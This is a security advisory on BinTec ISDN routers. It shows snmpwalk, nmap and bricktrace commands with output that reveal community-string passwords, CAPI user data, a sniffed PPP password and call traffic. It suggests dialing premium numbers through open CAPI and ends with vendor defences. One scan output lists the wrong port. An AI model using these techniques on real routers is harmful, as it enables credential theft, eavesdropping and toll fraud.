COMMAND
BinTec router
SYSTEMS AFFECTED
BinTec ISDN router family
PROBLEM
Following is based on TESO Security Advisory. By using SNMP
brute-force-techniques for SNMP community-names one is able to
gain the management accounts passwords, which are the same as the
SNMP community names. Additionally the MIB-Tree holds security
related information which should not be accessible through
read-only/SNMP. These routers also offer services which can be
abused rather easily, like dialing out and getting full line
access via a CAPI interface, or a debugging interface which gives
you all information which is sent over the BRI-lines. (Those
services are open as default and the debugging service is barely
documented). This was tested on:
- BIANCA/BRICK-XL
- BIANCA/BRICK-XS
Example system setup for examples given
=======================================
admin Login Password/SNMP Community bitkoenig
read Login Password/SNMP Community rince
write Login Password/SNMP Community guenthi
defaults are: admin/bintec read/public and write/public
Example of Read-Only SNMP output from a BinTec router
=====================================================
syslog:
bitch:~$ snmpwalk fefe.rookie.lan rince .1.3.6.1.4.1.272.4.1.12.1
[...]
enterprises.272.4.1.12.1.4.954440111.7.39 = "citykom-muenster:
local IP address is 195.202.40.124, remote is 195.202.32.121"
enterprises.272.4.1.12.1.4.954440116.7.40 =
"LOGOUT as admin from TELNET 192.168.0.100 at Thu Mar 30 18:15:16 2000"
enterprises.272.4.1.12.1.4.954440685.7.41 =
"LOGIN as admin from TELNET 192.168.0.100 at Thu Mar 30 18:24:45 2000"
enterprises.272.4.1.12.1.4.954440692.7.42 =
"citykom-muenster: outgoing connection closed, duration 583 sec, 18194
bytes received, 4934 bytes sent, 6 charging units, 0 charging amounts"
enterprises.272.4.1.12.1.4.954440692.7.43 =
"ISDN: 30.03.2000,18:15:08,18:24:52,583,18596,5306,134,124,6 Units,O,,
609910,7/0,0,0B,citykom-muenster"
[...]
capi-user-db:
bitch:~$ snmpwalk fefe.rookie.lan rince .1.3.6.1.4.1.272.4.7.8.1
enterprises.272.4.7.8.1.1.7.100.101.102.97.117.108.116.0 = "default"
/* username */
enterprises.272.4.7.8.1.2.7.100.101.102.97.117.108.116.0 = ""
/* password */
enterprises.272.4.7.8.1.6.7.100.101.102.97.117.108.116.0 = 1
/* capi access activated */
Remote CAPI Server on a BinTec router
=====================================
fefe:> ps -elf
[...]
S 0 26 1 28 0 Jan 1 ? 00:00 00:00 vcapid
[...]
Corresponding Port:
bitch:~# nmap -sS -O -p 6000 poor.brick.de
Starting nmap V.3.01beta by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on poor.brick.de (xxx.xxx.xxx.xxx):
Port State Protocol Service
6000 open tcp X11
TCP Sequence Prediction: Class=random positive increments
Difficulty=1894 (Medium)
Remote operating system guess:
Bintec Brick XS SW Release 4.9.1 ISDN access router
Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds
BrickTrace Server on a BinTec router:
=====================================
fefe:> ps -elf
[...]
S 0 24 1 28 0 Jan 1 ? 00:04 00:01 traced
[...]
Corresponding Port:
bitch:~# nmap -sS -O -p 7000 poor.brick.de
Starting nmap V.3.01beta by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on poor.brick.de (xxx.xxx.xxx.xxx):
Port State Protocol Service
6000 open tcp afs3-fileserver
TCP Sequence Prediction: Class=random positive increments
Difficulty=1894 (Medium)
Remote operating system guess:
Bintec Brick XS SW Release 4.9.1 ISDN access router
Nmap run completed -- 1 IP address (1 host up) scanned in 6 seconds
BrickTracing a password from an outgoing PPP connection
========================================================
bitch:~$ bricktrace -h2pi 1 0 2
bricktrace: Connected to 192.168.0.1(7000)
Tracing: Channel 1 Unit 0 Slot 2 /* Tracing the B-Channel */
[...]
020721.320 X DATA[0025]
0000: ff 03 c0 23 01 01 00 15 08 73 68 6f 6c 74 77 69 ...#.....user
0010: 73 07 72 65 74 68 6f 6f 6f .password
PPP packet protocol 0xc023 (PAP)
ID 1 PAP Authenticate-Request Peer-ID user Password password
A=FF UI
[...]
Snooping an S0 Bus for telephone calls
======================================
bitch:~$ bricktrace -h3 0 0 2
bricktrace: Connected to 192.168.0.1(7000)
Tracing: Channel 0 Unit 0 Slot 2 /* Tracing the D-Channel */
[...]
021096.656 R DATA[0015]
0000: 02 b3 10 1a 08 01 81 0d 18 01 89 1e 02 82 88 ...............
PD=08 Dest CR=01 SETUP ACKNOWLEDGE
IE-Element : Channel Identification :
Interface implicitly identified
Interface type S0
Channelnumber is exclusive (accept only this)
Identified Channel is not D-Channel
Selected Channel : B1-Channel
IE-Element : Progress Indicator reports
In-band information now available
[...]
021105.366 R DATA[0008]
0000: 02 b3 12 2e 08 01 81 02 ........
PD=08 Dest CR=01 CALL PROCEEDING
021108.076 R DATA[0012]
0000: 02 b3 14 2e 08 01 81 01 1e 02 82 88 ............
PD=08 Dest CR=01 ALERT
IE-Element : Progress Indicator reports
In-band information now available
[...]
021124.748 R DATA[0028]
0000: 02 b3 16 2e 08 01 81 07 29 05 00 03 1e 12 23 4c ........).....#L
0010: 0b 21 83 31 33 30 31 31 32 31 31 32 .!.130112112
PD=08 Dest CR=01 CONNECT
IE-Element : Date yy.mm.dd-hh:mm : 0.3.30-18:35:134597435
IE-Element : Unknown IE-Element 0x4c in Codeset 0
[...]
021130.282 R DATA[0045]
0000: 02 b3 1a 32 08 01 81 4d 1c 16 91 a1 13 02 02 c4 ...2...M........
0010: 37 02 01 22 30 0a a1 05 30 03 02 01 00 82 01 01 7.."0...0.......
0020: 28 0b 30 20 45 69 6e 68 65 69 74 65 6e (.0 Einheiten
PD=08 Dest CR=01 RELEASE
IE-Element : Facility
Service discriminator is supplement. application
Component tag is invoke
integer (0x2)
50231
integer (0x1)
34
sequence (0xa)
{
GetNextRequest (0x5)
{
sequence (0x3)
{
integer (0x1)
0
}
}
GetResponse (0x1)
}
IE-Element : Display : 0 Einheiten
[...]
Checking line status from BinTec's httpd:
=========================================
[...]
Hardware Interfaces
Slot 1 Ethernet o.k.
Slot 2 ISDN S2M o.k. used 13, available 17
- - X X X X X - X -
- - X - X - - X - -
X - - - X - - X - X
[...]
now we know what to sniff:
sniffing an inbound ppp connection on line 4 slot 2:
bitch:~$ bricktrace -h2pit 4 0 2
bricktrace: Connected to aaa.bbb.ccc.ddd(7000)
Tracing: Channel 4 Unit 0 Slot 2
[...]
004419.999 X DATA[0045]
0000: 21 45 00 00 2c 39 07 40 00 3e 06 f5 cc c2 61 44 !E..,9.@.>....aD
0010: 0d c2 61 45 28 00 50 da 79 bc f8 a9 a7 02 2b c5 ..aE(.P.y.....+.
0020: 7a 60 12 44 70 3c z.Dp<
Compressed PPP packet protocol 0x21 (TCP/IP)
A=21 RNR P/F=0 N(R)=2
IP-Packet from aaa.bbb.ccc.ddd to a.b.c.d protocol 0x6
TCP-Message, sourceport 80 destinationport 55929
sequence number 3170412967
acknowledgement number 36423034
offset 6 flags ACK SYN
window 17520 checksum 0x3c9e urgent 0
[...]
004420.640 R DATA[0609]
0000: 2d 70 0e b0 43 ff 47 45 54 20 68 74 74 70 3a 2f -p..C.GET http:/
0010: 2f 63 68 61 74 33 2e 70 6c 61 79 67 72 6f 75 6e /chat3.playgroun
0020: 64 2e 64 65 2f 63 d.de/c
Compressed PPP packet protocol 0x2d (VJ Compressed TCP/IP)
A=2D I P/F=1 N(R)=3 N(S)=0
0E B0 C FF G E T h t t p : / / c h a t 3
. p l a y g r o u n d . d e / c h a t
IP-Packet from a to b protocol 0x2f
[...]
Impact is following:
(1) SNMP communities / login passwords
By using standard brute-force methods, the SNMP community
string, and therefore the login's passwords can be obtained.
A program doing this is for example ADMsnmp, which has to be
feeded by a wordlist. Bruteforcing this way is quite
effective, you get about 500-1000 words per minute. (which
of course depends on your and the routers connectivity) You
can get this program from
ftp://adm.freelsd.net/pub/ADM/ADMsnmp.0.1.tgz
Bruteforcing the passwords directly via telnet isn't possible
because the router slows down after approx. 6 tries.
(2) Using the CAPI facility
Nearly any router can remotely be used as 'ISDN-Line
provider' - you can use the BRI-Lines of the router if they
are not password protected. While doing a short survey most
machines we encountered were proven to be vulnerable, so they
didn't have any restrictions set. The CAPI daemon listens on
port 6000 as you can see in the 'Tests' section. This
feature can, for example be exploited by dialing expensive
numbers (0900 or 0190 [in DE] lines). You may also hide your
real identity by calling a 'call-by-call' ISP who gives you
another IP you can deal with. A (R)CAPI library for Un*x
exists, which can be used for these attacks. It is available
via
ftp://ftp.bintec.de/pub/brick/libcapi/
There is also a CAPI user interface for MS Windows, which is
called Brickware and can be obtained via
ftp://ftp.bintec.de/pub/brick/brickware/
Firmware before 5.1.x seems to be generally not passworded,
TESO did not checked 5.1.x yet.
(3) Using BrickTrace for snooping BRI-Lines
You can gain information of the ISP or corporation running
these routers with open BrickTrace ports (Port 7000, default)
with a program called bricktrace, which is available via
ftp://ftp.bintec.de/pub/brick/unixtool/
In the documentation this port isn't even stated (!). See
'Solution' for how to turn off this port. As you can see the
whole data passing the line, so you also get the users
passwords and see what they do in the net (it is in a way
like a dedicated sniffer). Using this technique of sniffing
you may also see private information of corporations, not
only restricting you to Internet traffic but also on
'intranet' lines that use the same router, as well as
telephony networks (S0 bus).
The bug-discovery and the demonstration are due to Stephan
Holtwisch.
SOLUTION
1. Detecting and defending SNMP-Brute Force Access
==================================================
Scanning the management account passwords of a Bintec Router with
a brute force attack via SNMP access can be detected and prevented
in the following ways:
Detection:
Every system access with an invalid management account password
is detected by the router and logged (local, via console and
via syslog to one or more external hosts). In addition to that,
SNMP requests with illegal community passwords cause an SNMP
Trap.
Defense:
We recommend using one or more of the following three methods to
deny SNMP access from untrusted WAN interfaces or to restrict
SNMP access to trusted IP addresses.
a) Use of Network Address Translation.
The use of NAT will allow outgoing connections but deny any
incoming connections from hosts on the other side of the
WAN interface. This is also the default configuration for
internet access, when the Bintec Router is configured via
the Wizard. Bintec routers also can offer a special NAT
mode without Address Translation, i.e. packets traveling
through the router are not modified but connections from
outside are still denied.
b) Use of Access Lists
Filters and access lists can be defined for every interface.
They can be used to grant access to local services via
trusted IP addresses and/or trusted interfaces only, and deny
the access to all others.
c) Use of "Local Service" Access Lists
There are also two SNMP tables on the system to specify the
trusted IP addresses to connect to any local service
(localtcpallowtable and localudpallowtable). These tables
are easier to handle and set up than access lists. Beginning
with release 5.2.1, this configuration will be accessible via
the built-in SETUP-Tool.
2. Defending SNMP Access to security related information
========================================================
To defend SNMP-Access to security related information in the
private MIBs, the SNMP access has to be restricted. Again we
recommend using one or more of the three methods mentioned in
section 1a) to 1c)
3. Detecting and Defending abuse of other local services
========================================================
The abuse of other local services like CAPI, TAPI and TRACE can
be detected and prevented in the following ways:
Detection:
Every CAPI, TAPI and trace connection is detected and logged
(local, via console and via syslog to one or more external
hosts). The syslog includes timestap, source IP address/port
and type of service. If connections are established or accepted
via CAPI and/or TAPI, the timestamp, duration, number, charging
information are logged together with source IP address of the
TAPI/CAPI-user.
Defense:
We recommend using one or more of the following three methods
mentioned in section 1a) to 1c) to defend CAPI/TAPI or TRACE
access from untrusted WAN interfaces or to restrict the access
to trusted IP addresses.